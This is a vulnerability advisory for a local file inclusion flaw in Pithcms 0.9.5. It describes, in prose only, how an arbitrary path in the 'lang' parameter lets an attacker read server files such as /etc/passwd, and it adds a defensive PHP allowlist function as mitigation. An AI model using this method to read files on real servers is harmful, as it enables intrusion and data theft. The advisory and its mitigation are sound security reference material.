vendor: Pithcms
by: sh00t0ut
CVSS: 9,3 HIGH
Local Include Exploit
CWE: 98
Product Name: Pithcms
Affected Version From: 0.9.5
Affected Version To: 0.9.5
Patch Exists: NO
Related CWE: N/A
CPE: a:pithcms:pithcms:0.9.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Pithcms 0.9.5 Local Include Exploit
Pithcms 0.9.5 is vulnerable to local file inclusion. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server with an arbitrary file path in the 'lang' parameter. This allows the attacker to read the contents of that file, for example /etc/passwd.
Mitigation:
Mitigate this vulnerability by eliminating the local file inclusion in the application: validate user input and ensure that only trusted files are included.
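
One way to apply that mitigation to a 'lang' parameter, as an added example that is not Pithcms code. It assumes a PHP application that keeps one language file per language code in a single directory; `LANG_DIR`, `DEFAULT_LANG` and `resolve_lang_file()` are hypothetical names.

```php
<?php
// Added example, not Pithcms code. LANG_DIR, DEFAULT_LANG and
// resolve_lang_file() are hypothetical names for illustration.
const LANG_DIR = __DIR__ . '/lang';
const DEFAULT_LANG = 'en';

/**
 * Map a request-supplied language code to a file inside LANG_DIR.
 * Returns the default language file whenever the value is not trusted.
 */
function resolve_lang_file($requested): string
{
    $default = LANG_DIR . '/' . DEFAULT_LANG . '.php';

    // 1. Shape check: accept a short language code only, so slashes, dots,
    //    NUL bytes and URL schemes never reach a filesystem call.
    if (!is_string($requested)
        || !preg_match('/\A[a-z]{2}(_[A-Z]{2})?\z/', $requested)) {
        return $default;
    }

    // 2. Allowlist: the code must name a file that actually ships in LANG_DIR.
    $trusted = array_map(
        fn(string $p): string => basename($p, '.php'),
        glob(LANG_DIR . '/*.php') ?: []
    );
    if (!in_array($requested, $trusted, true)) {
        return $default;
    }

    // 3. Containment: the resolved path must still sit inside LANG_DIR
    //    (covers symlinks placed in the directory).
    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $default;
    }
    return $path;
}

// Usage: the include argument is never built from raw request data.
// require resolve_lang_file($_GET['lang'] ?? DEFAULT_LANG);
```

Rejected values fall back to the default language instead of producing an error, so the response does not reveal which paths exist on the server.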